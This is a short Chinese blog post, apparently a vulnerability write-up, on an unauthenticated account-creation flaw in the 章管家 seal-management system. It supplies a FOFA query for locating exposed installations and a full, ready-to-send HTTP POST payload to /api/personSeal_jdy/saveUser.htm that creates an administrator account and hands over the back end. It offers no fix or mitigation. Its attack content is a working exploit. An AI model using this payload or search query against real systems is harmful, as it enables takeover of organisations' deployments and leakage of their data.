Babing
Published on 2024-08-30 / 3 Visits
0
0

S44-1上海建业信息科技股份-章管家-PermissionAC

S44-1上海建业信息科技股份-章管家-PermissionAC

漏洞描述:

章管家 /api/personSeal_jdy/saveUser.htm 接口处存在任意用户创建漏洞,未经身份验证的远程攻击者可以利用此漏洞创建管理员账户,从而接管系统后台,造成信息泄露,导致系统处于极不安全的状态。

fofa语法:

body=“章管家登录-公章在外防私盖”

漏洞复现:

payload:

POST /api/personSeal_jdy/saveUser.htm HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept-Encoding: gzip, deflate
Accept: */*
Content-Type: application/json

{"op":{},"data":{"mobile":"14333333333","uid":"14333333333","password":"123456","name":"ceshi","return_url":"https://www.baidu.com","apisecretkey":"1","_id":"1","mail_address":"111@qq.com"},"b7o4ntosbfp":"="}

效果图:
效果图
尝试登录
payload:

效果图:
效果图


Comment